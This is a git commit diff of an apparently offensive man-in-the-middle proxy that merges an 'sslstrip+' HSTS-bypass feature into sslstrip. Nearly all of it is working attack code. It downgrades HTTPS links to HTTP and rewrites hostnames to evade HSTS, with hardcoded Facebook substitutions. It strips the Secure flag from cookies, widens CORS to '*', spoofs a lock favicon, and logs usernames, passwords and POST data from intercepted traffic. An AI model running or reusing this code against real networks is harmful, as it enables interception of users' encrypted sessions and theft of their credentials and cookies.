merged sslstrip+ into sslstrip, tweaked hsts bypass performance

This commit is contained in:
byt3bl33d3r 2014-12-16 02:03:02 +01:00
parent b118106d9d
commit 642fa9cb6a
14 changed files with 234 additions and 954 deletions

View file

@ -16,7 +16,7 @@
# USA
#
import urlparse, logging, os, sys, random
import urlparse, logging, os, sys, random, re
from twisted.web.http import Request
from twisted.web.http import HTTPChannel
@ -34,6 +34,7 @@ from URLMonitor import URLMonitor
from CookieCleaner import CookieCleaner
from DnsCache import DnsCache
from libs.sergioproxy.ProxyPlugins import ProxyPlugins
from configobj import ConfigObj
class ClientRequest(Request):
@ -47,6 +48,7 @@ class ClientRequest(Request):
Request.__init__(self, channel, queued)
self.reactor = reactor
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().isHstsBypass()
self.cookieCleaner = CookieCleaner.getInstance()
self.dnsCache = DnsCache.getInstance()
self.plugins = ProxyPlugins.getInstance()
@ -69,6 +71,23 @@ class ClientRequest(Request):
if 'cache-control' in headers:
del headers['cache-control']
if self.hsts:
if 'if-none-match' in headers:
del headers['if-none-match']
if 'referer' in headers:
real = self.urlMonitor.real
if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
if 'host' in headers:
host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host))
headers['host'] = host
headers['securelink'] = '1'
self.setHeader('Host',host)
self.plugins.hook()
return headers
@ -104,33 +123,76 @@ class ClientRequest(Request):
except:
pass
url = 'http://' + host + path
self.uri = url # set URI to absolute
if self.hsts:
#self.dnsCache.cacheResolution(host, address)
real = self.urlMonitor.real
patchDict = self.urlMonitor.patchDict
hostparts = host.split(':')
self.dnsCache.cacheResolution(hostparts[0], address)
if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path)
postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData)
if len(patchDict)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData)
url = 'http://' + host + path
headers['content-length'] = "%d" % len(postData)
#self.dnsCache.cacheResolution(host, address)
hostparts = host.split(':')
self.dnsCache.cacheResolution(hostparts[0], address)
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
logging.debug("Sending expired cookies...")
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client,
host, headers, path))
elif (self.urlMonitor.isSecureFavicon(client, path)):
logging.debug("Sending spoofed favicon response...")
self.sendSpoofedFaviconResponse()
elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
if 'securelink' in headers:
del headers['securelink']
logging.debug("LEO Sending request via SSL...(%s %s)"%(client,url))
self.proxyViaSSL(address, self.method, path, postData, headers,
self.urlMonitor.getSecurePort(client, url))
else:
logging.debug("LEO Sending request via HTTP...")
#self.proxyViaHTTP(address, self.method, path, postData, headers)
port = 80
if len(hostparts) > 1:
port = int(hostparts[1])
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
logging.debug("Sending expired cookies...")
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client,
host, headers, path))
elif (self.urlMonitor.isSecureFavicon(client, path)):
logging.debug("Sending spoofed favicon response...")
self.sendSpoofedFaviconResponse()
elif (self.urlMonitor.isSecureLink(client, url)):
logging.debug("Sending request via SSL...")
self.proxyViaSSL(address, self.method, path, postData, headers,
self.urlMonitor.getSecurePort(client, url))
else:
logging.debug("Sending request via HTTP...")
#self.proxyViaHTTP(address, self.method, path, postData, headers)
port = 80
if len(hostparts) > 1:
port = int(hostparts[1])
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
url = 'http://' + host + path
self.uri = url # set URI to absolute
#self.dnsCache.cacheResolution(host, address)
hostparts = host.split(':')
self.dnsCache.cacheResolution(hostparts[0], address)
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
logging.debug("Sending expired cookies...")
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client,
host, headers, path))
elif (self.urlMonitor.isSecureFavicon(client, path)):
logging.debug("Sending spoofed favicon response...")
self.sendSpoofedFaviconResponse()
elif (self.urlMonitor.isSecureLink(client, url)):
logging.debug("Sending request via SSL...")
self.proxyViaSSL(address, self.method, path, postData, headers,
self.urlMonitor.getSecurePort(client, url))
else:
logging.debug("Sending request via HTTP...")
#self.proxyViaHTTP(address, self.method, path, postData, headers)
port = 80
if len(hostparts) > 1:
port = int(hostparts[1])
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
def handleHostResolvedError(self, error):
logging.warning("Host resolution error: " + str(error))
@ -152,8 +214,22 @@ class ClientRequest(Request):
def process(self):
logging.debug("Resolving host: %s" % (self.getHeader('host')))
host = self.getHeader('host')
#deferred = self.resolveHost(host)
if (self.hsts and host):
real = self.urlMonitor.real
if 'wwww' in host:
logging.debug("Resolving %s for HSTS bypass" % (host))
host = host[1:]
elif 'web' in host:
logging.debug("Resolving %s for HSTS bypass" % (host))
host = host[3:]
elif host in real:
logging.debug("Resolving %s for HSTS bypass" % (host))
host = real[host]
hostparts = host.split(':')
#deferred = self.resolveHost(host)
deferred = self.resolveHost(hostparts[0])
deferred.addCallback(self.handleHostResolvedSuccess)

View file

@ -44,8 +44,29 @@ class SSLServerConnection(ServerConnection):
return "SECURE POST"
def handleHeader(self, key, value):
if (key.lower() == 'set-cookie'):
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
if ServerConnection.isHsts(self):
if (key.lower() == 'set-cookie'):
newvalues =[]
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
values = value.split(';')
for v in values:
if v[:7].lower()==' domain':
dominio=v.split("=")[1]
logging.debug("LEO Parsing cookie domain parameter: %s"%v)
real = self.urlMonitor.sustitucion
if dominio in real:
v=" Domain=%s"%real[dominio]
logging.debug("LEO New cookie domain parameter: %s"%v)
newvalues.append(v)
value = ';'.join(newvalues)
if (key.lower() == 'access-control-allow-origin'):
value='*'
else:
if (key.lower() == 'set-cookie'):
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
ServerConnection.handleHeader(self, key, value)

View file

@ -33,6 +33,11 @@ class ServerConnection(HTTPClient):
urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
urlType = re.compile(r"https://", re.IGNORECASE)
urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlTypewww = re.compile(r"https://www", re.IGNORECASE)
urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE)
urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE)
#urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
@ -42,6 +47,7 @@ class ServerConnection(HTTPClient):
self.headers = headers
self.client = client
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().isHstsBypass()
self.plugins = ProxyPlugins.getInstance()
self.isImageRequest = False
self.isCompressed = False
@ -62,6 +68,9 @@ class ServerConnection(HTTPClient):
def getPostPrefix(self):
return "POST"
def isHsts(self):
return self.hsts
def sendRequest(self):
if self.command == 'GET':
message = "%s Sending Request: %s" % (self.client.getClientIP(), self.headers['host'])
@ -231,19 +240,53 @@ class ServerConnection(HTTPClient):
logging.info("Client connection dropped before request finished.")
def replaceSecureLinks(self, data):
iterator = re.finditer(ServerConnection.urlExpression, data)
if self.hsts:
for match in iterator:
url = match.group()
sustitucion = {}
patchDict = self.urlMonitor.patchDict
if len(patchDict)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data)
logging.debug("Found secure reference: " + url)
iterator = re.finditer(ServerConnection.urlExpression, data)
for match in iterator:
url = match.group()
url = url.replace('https://', 'http://', 1)
url = url.replace('&amp;', '&')
self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
logging.debug("Found secure reference: " + url)
nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
logging.debug("LEO replacing %s => %s"%(url,nuevaurl))
sustitucion[url] = nuevaurl
#data.replace(url,nuevaurl)
data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data)
return re.sub(ServerConnection.urlType, 'http://', data)
#data = self.urlMonitor.DataReemplazo(data)
if len(sustitucion)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, sustitucion.keys())))
data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)
#logging.debug("LEO DEBUG received data:\n"+data)
#data = re.sub(ServerConnection.urlExplicitPort, r'https://\1/', data)
#data = re.sub(ServerConnection.urlTypewww, 'http://w', data)
#if data.find("http://w.face")!=-1:
# logging.debug("LEO DEBUG Found error in modifications")
# raw_input("Press Enter to continue")
#return re.sub(ServerConnection.urlType, 'http://web.', data)
return data
else:
iterator = re.finditer(ServerConnection.urlExpression, data)
for match in iterator:
url = match.group()
logging.debug("Found secure reference: " + url)
url = url.replace('https://', 'http://', 1)
url = url.replace('&amp;', '&')
self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data)
return re.sub(ServerConnection.urlType, 'http://', data)
def shutdown(self):
if not self.shutdownComplete:

View file

@ -17,6 +17,8 @@
#
import re, os
import logging
from configobj import ConfigObj
class URLMonitor:
@ -28,12 +30,26 @@ class URLMonitor:
# Start the arms race, and end up here...
javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
_instance = None
sustitucion = {} # LEO: diccionario host / sustitucion
real = {} # LEO: diccionario host / real
patchDict = {
'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net',
'https:\/\/www.facebook.com':'http:\/\/social.facebook.com',
'return"https:"':'return"http:"'
}
def __init__(self):
self.strippedURLs = set()
self.strippedURLPorts = {}
self.redirects = []
self.faviconReplacement = False
self.hsts = False
hsts_config = ConfigObj("./config/hsts_bypass.cfg")
for k,v in hsts_config.items():
self.sustitucion[k] = v
self.real[v] = k
def isSecureLink(self, client, url):
for expression in URLMonitor.javascriptTrickery:
@ -85,7 +101,7 @@ class URLMonitor:
method = url[0:methodIndex]
pathIndex = url.find("/", methodIndex)
host = url[methodIndex:pathIndex]
host = url[methodIndex:pathIndex].lower()
path = url[pathIndex:]
port = 443
@ -97,13 +113,34 @@ class URLMonitor:
if len(port) == 0:
port = 443
url = method + host + path
if self.hsts:
#LEO: Sustituir HOST
if not self.sustitucion.has_key(host):
lhost = host[:4]
if lhost=="www.":
self.sustitucion[host] = "w"+host
self.real["w"+host] = host
else:
self.sustitucion[host] = "web"+host
self.real["web"+host] = host
logging.debug("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
url = 'http://' + host + path
#logging.debug("LEO stripped URL: %s %s"%(client, url))
def setValues(self, faviconSpoofing, clientLogging):
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
return 'http://'+self.sustitucion[host]+path
else:
url = method + host + path
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
def setValues(self, faviconSpoofing, hstsbypass=False, clientLogging=False,):
self.faviconSpoofing = faviconSpoofing
self.hsts = hstsbypass
self.clientLogging = clientLogging
def isFaviconSpoofing(self):
@ -112,9 +149,21 @@ class URLMonitor:
def isClientLogging(self):
return self.clientLogging
def isHstsBypass(self):
return self.hsts
def isSecureFavicon(self, client, url):
return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))
def URLgetRealHost(self,host):
logging.debug("Parsing host: %s"%host)
if self.real.has_key(host):
logging.debug("New host: %s"%self.real[host])
return self.real[host]
else:
logging.debug("New host: %s"%host)
return host
def getInstance():
if URLMonitor._instance == None:
URLMonitor._instance = URLMonitor()

View file

@ -1,212 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import urlparse, logging, os, sys, random, re
from twisted.web.http import Request
from twisted.web.http import HTTPChannel
from twisted.web.http import HTTPClient
from twisted.internet import ssl
from twisted.internet import defer
from twisted.internet import reactor
from twisted.internet.protocol import ClientFactory
from ServerConnectionFactory import ServerConnectionFactory
from ServerConnection import ServerConnection
from SSLServerConnection import SSLServerConnection
from URLMonitor import URLMonitor
from CookieCleaner import CookieCleaner
from libs.sslstrip.DnsCache import DnsCache
from libs.sergioproxy.ProxyPlugins import ProxyPlugins
class ClientRequest(Request):
''' This class represents incoming client requests and is essentially where
the magic begins. Here we remove the client headers we dont like, and then
respond with either favicon spoofing, session denial, or proxy through HTTP
or SSL to the server.
'''
def __init__(self, channel, queued, reactor=reactor):
Request.__init__(self, channel, queued)
self.reactor = reactor
self.urlMonitor = URLMonitor.getInstance()
self.cookieCleaner = CookieCleaner.getInstance()
self.dnsCache = DnsCache.getInstance()
self.plugins = ProxyPlugins.getInstance()
# self.uniqueId = random.randint(0, 10000)
def cleanHeaders(self):
headers = self.getAllHeaders().copy()
if 'accept-encoding' in headers:
del headers['accept-encoding']
if 'referer' in headers:
real = self.urlMonitor.real
if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
if 'if-modified-since' in headers:
del headers['if-modified-since']
if 'strict-transport-security' in headers: #kill new hsts requests
del headers['strict-transport-security']
logging.info("Zapped HSTS header")
if 'cache-control' in headers:
del headers['cache-control']
if 'if-none-match' in headers:
del headers['if-none-match']
if 'host' in headers:
host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host))
headers['host'] = host
headers['securelink'] = '1'
self.setHeader('Host',host)
self.plugins.hook()
return headers
def getPathFromUri(self):
if (self.uri.find("http://") == 0):
index = self.uri.find('/', 7)
return self.uri[index:]
return self.uri
def getPathToLockIcon(self):
if os.path.exists("lock.ico"): return "lock.ico"
scriptPath = os.path.abspath(os.path.dirname(sys.argv[0]))
scriptPath = os.path.join(scriptPath, "../share/sslstrip/lock.ico")
if os.path.exists(scriptPath): return scriptPath
logging.warning("Error: Could not find lock.ico")
return "lock.ico"
def handleHostResolvedSuccess(self, address):
headers = self.cleanHeaders()
# for header in headers:
# logging.debug("HEADER %s = %s",header,headers[header])
logging.debug("Resolved host successfully: %s -> %s" % (self.getHeader('host').lower(), address))
lhost = self.getHeader("host").lower()
host = self.urlMonitor.URLgetRealHost("%s" % lhost)
client = self.getClientIP()
path = self.getPathFromUri()
try:
self.content.seek(0, 0)
except:
pass
postData = self.content.read()
real = self.urlMonitor.real
patchDict = self.urlMonitor.patchDict
if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path)
postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData)
if len(patchDict)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData)
url = 'http://' + host + path
headers['content-length'] = "%d" % len(postData)
self.dnsCache.cacheResolution(host, address)
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
logging.debug("Sending expired cookies...")
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client,
host, headers, path))
elif (self.urlMonitor.isSecureFavicon(client, path)):
logging.debug("Sending spoofed favicon response...")
self.sendSpoofedFaviconResponse()
elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
if 'securelink' in headers:
del headers['securelink']
logging.debug("LEO Sending request via SSL...(%s %s)"%(client,url))
self.proxyViaSSL(address, self.method, path, postData, headers,
self.urlMonitor.getSecurePort(client, url))
else:
logging.debug("LEO Sending request via HTTP...")
self.proxyViaHTTP(address, self.method, path, postData, headers)
def handleHostResolvedError(self, error):
logging.warning("Host resolution error: " + str(error))
try:
self.finish()
except:
pass
def resolveHost(self, host):
address = self.dnsCache.getCachedAddress(host)
if address != None:
logging.debug("Host cached.")
return defer.succeed(address)
else:
logging.debug("Host not cached.")
return reactor.resolve(host)
def process(self):
host = self.urlMonitor.URLgetRealHost("%s"%self.getHeader('host'))
logging.debug("Resolving host: %s" % host)
deferred = self.resolveHost(host)
deferred.addCallback(self.handleHostResolvedSuccess)
deferred.addErrback(self.handleHostResolvedError)
def proxyViaHTTP(self, host, method, path, postData, headers):
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
connectionFactory.protocol = ServerConnection
self.reactor.connectTCP(host, 80, connectionFactory)
def proxyViaSSL(self, host, method, path, postData, headers, port):
clientContextFactory = ssl.ClientContextFactory()
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
connectionFactory.protocol = SSLServerConnection
self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory)
def sendExpiredCookies(self, host, path, expireHeaders):
self.setResponseCode(302, "Moved")
self.setHeader("Connection", "close")
self.setHeader("Location", "http://" + host + path)
for header in expireHeaders:
self.setHeader("Set-Cookie", header)
self.finish()
def sendSpoofedFaviconResponse(self):
icoFile = open(self.getPathToLockIcon())
self.setResponseCode(200, "OK")
self.setHeader("Content-type", "image/x-icon")
self.write(icoFile.read())
icoFile.close()
self.finish()

View file

@ -1,106 +0,0 @@
# Copyright (c) 2004-2011 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import string
class CookieCleaner:
'''This class cleans cookies we haven't seen before. The basic idea is to
kill sessions, which isn't entirely straight-forward. Since we want this to
be generalized, there's no way for us to know exactly what cookie we're trying
to kill, which also means we don't know what domain or path it has been set for.
The rule with cookies is that specific overrides general. So cookies that are
set for mail.foo.com override cookies with the same name that are set for .foo.com,
just as cookies that are set for foo.com/mail override cookies with the same name
that are set for foo.com/
The best we can do is guess, so we just try to cover our bases by expiring cookies
in a few different ways. The most obvious thing to do is look for individual cookies
and nail the ones we haven't seen coming from the server, but the problem is that cookies are often
set by Javascript instead of a Set-Cookie header, and if we block those the site
will think cookies are disabled in the browser. So we do the expirations and whitlisting
based on client,server tuples. The first time a client hits a server, we kill whatever
cookies we see then. After that, we just let them through. Not perfect, but pretty effective.
'''
_instance = None
def getInstance():
if CookieCleaner._instance == None:
CookieCleaner._instance = CookieCleaner()
return CookieCleaner._instance
getInstance = staticmethod(getInstance)
def __init__(self):
self.cleanedCookies = set();
self.enabled = False
def setEnabled(self, enabled):
self.enabled = enabled
def isClean(self, method, client, host, headers):
if method == "POST": return True
if not self.enabled: return True
if not self.hasCookies(headers): return True
return (client, self.getDomainFor(host)) in self.cleanedCookies
def getExpireHeaders(self, method, client, host, headers, path):
domain = self.getDomainFor(host)
self.cleanedCookies.add((client, domain))
expireHeaders = []
for cookie in headers['cookie'].split(";"):
cookie = cookie.split("=")[0].strip()
expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path)
expireHeaders.extend(expireHeadersForCookie)
return expireHeaders
def hasCookies(self, headers):
return 'cookie' in headers
def getDomainFor(self, host):
hostParts = host.split(".")
return "." + hostParts[-2] + "." + hostParts[-1]
def getExpireCookieStringFor(self, cookie, host, domain, path):
pathList = path.split("/")
expireStrings = list()
expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain +
";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host +
";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
if len(pathList) > 2:
expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
return expireStrings

View file

@ -1,11 +0,0 @@
SSLStrip+
=========
This is a new version of [Moxie´s SSLstrip] (http://www.thoughtcrime.org/software/sslstrip/) with the new feature to avoid HTTP Strict Transport Security (HSTS) protection mechanism.
This version changes HTTPS to HTTP as the original one plus the hostname at html code to avoid HSTS. Check my slides at BlackHat ASIA 2014 [OFFENSIVE: EXPLOITING DNS SERVERS CHANGES] (http://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) for more information.
For this to work you also need a DNS server that reverse the changes made by the proxy, you can find it at https://github.com/LeonardoNve/dns2proxy.
Demo video at: http://www.youtube.com/watch?v=uGBjxfizy48

View file

@ -1,121 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging, re, string
from ServerConnection import ServerConnection
class SSLServerConnection(ServerConnection):
'''
For SSL connections to a server, we need to do some additional stripping. First we need
to make note of any relative links, as the server will be expecting those to be requested
via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies.
'''
cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
iconExpression = re.compile(r"<link rel=\"shortcut icon\" .*href=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
headExpression = re.compile(r"<head>", re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
ServerConnection.__init__(self, command, uri, postData, headers, client)
def getLogLevel(self):
return logging.INFO
def getPostPrefix(self):
return "SECURE POST"
def handleHeader(self, key, value):
if (key.lower() == 'set-cookie'):
newvalues =[]
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
values = value.split(';')
for v in values:
if v[:7].lower()==' domain':
dominio=v.split("=")[1]
logging.debug("LEO Parsing cookie domain parameter: %s"%v)
real = self.urlMonitor.sustitucion
if dominio in real:
v=" Domain=%s"%real[dominio]
logging.debug("LEO New cookie domain parameter: %s"%v)
newvalues.append(v)
value = ';'.join(newvalues)
if (key.lower() == 'access-control-allow-origin'):
value='*'
ServerConnection.handleHeader(self, key, value)
def stripFileFromPath(self, path):
(strippedPath, lastSlash, file) = path.rpartition('/')
return strippedPath
def buildAbsoluteLink(self, link):
absoluteLink = ""
if ((not link.startswith('http')) and (not link.startswith('/'))):
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
logging.debug("Found path-relative link in secure transmission: " + link)
logging.debug("New Absolute path-relative link: " + absoluteLink)
elif not link.startswith('http'):
absoluteLink = "http://"+self.headers['host']+link
logging.debug("Found relative link in secure transmission: " + link)
logging.debug("New Absolute link: " + absoluteLink)
if not absoluteLink == "":
absoluteLink = absoluteLink.replace('&amp;', '&')
self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink);
def replaceCssLinks(self, data):
iterator = re.finditer(SSLServerConnection.cssExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(1))
return data
def replaceFavicon(self, data):
match = re.search(SSLServerConnection.iconExpression, data)
if (match != None):
data = re.sub(SSLServerConnection.iconExpression,
"<link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
else:
data = re.sub(SSLServerConnection.headExpression,
"<head><link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
return data
def replaceSecureLinks(self, data):
data = ServerConnection.replaceSecureLinks(self, data)
data = self.replaceCssLinks(data)
if (self.urlMonitor.isFaviconSpoofing()):
data = self.replaceFavicon(data)
iterator = re.finditer(SSLServerConnection.linkExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(10))
return data

View file

@ -1,230 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging, re, string, random, zlib, gzip, StringIO
import plugins
from twisted.web.http import HTTPClient
from URLMonitor import URLMonitor
from libs.sergioproxy.ProxyPlugins import ProxyPlugins
class ServerConnection(HTTPClient):
''' The server connection is where we do the bulk of the stripping. Everything that
comes back is examined. The headers we dont like are removed, and the links are stripped
from HTTPS to HTTP.
'''
urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
urlType = re.compile(r"https://", re.IGNORECASE)
urlTypewww = re.compile(r"https://www", re.IGNORECASE)
urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE)
urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE)
# urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
self.command = command
self.uri = uri
self.postData = postData
self.headers = headers
self.client = client
self.urlMonitor = URLMonitor.getInstance()
self.plugins = ProxyPlugins.getInstance()
self.isImageRequest = False
self.isCompressed = False
self.contentLength = None
self.shutdownComplete = False
#these field names were stolen from the etter.fields file (Ettercap Project)
self.http_userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name',
'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in']
self.http_passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password'
'passwort', 'passwrd', 'wppassword', 'upasswd']
def getLogLevel(self):
return logging.DEBUG
def getPostPrefix(self):
return "POST"
def sendRequest(self):
if self.command == 'GET':
logging.info("%s Sending Request: %s" % (self.client.getClientIP(), self.headers['host']))
#check for creds passed in GET requests.. It's surprising to see how many people still do this (please stahp)
for user in self.http_userfields:
username = re.findall("("+ user +")=([^&|;]*)", self.uri, re.IGNORECASE)
for passw in self.http_passfields:
password = re.findall("(" + passw + ")=([^&|;]*)", self.uri, re.IGNORECASE)
if (username and password):
message = "%s %s Possible Credentials (%s):\n%s" % (self.client.getClientIP(), self.command, self.headers['host'], self.uri)
logging.warning(message)
self.plugins.hook()
self.sendCommand(self.command, self.uri)
def sendHeaders(self):
for header, value in self.headers.items():
logging.debug(self.getLogLevel(), "Sending header: %s : %s" % (header, value))
self.sendHeader(header, value)
self.endHeaders()
def sendPostData(self):
if 'clientprfl' in self.uri:
self.plugins.hook()
elif 'keylog' in self.uri:
self.plugins.hook()
else:
logging.warning("%s %s Data (%s):\n%s" % (self.client.getClientIP(),self.getPostPrefix(),self.headers['host'],self.postData))
self.transport.write(self.postData)
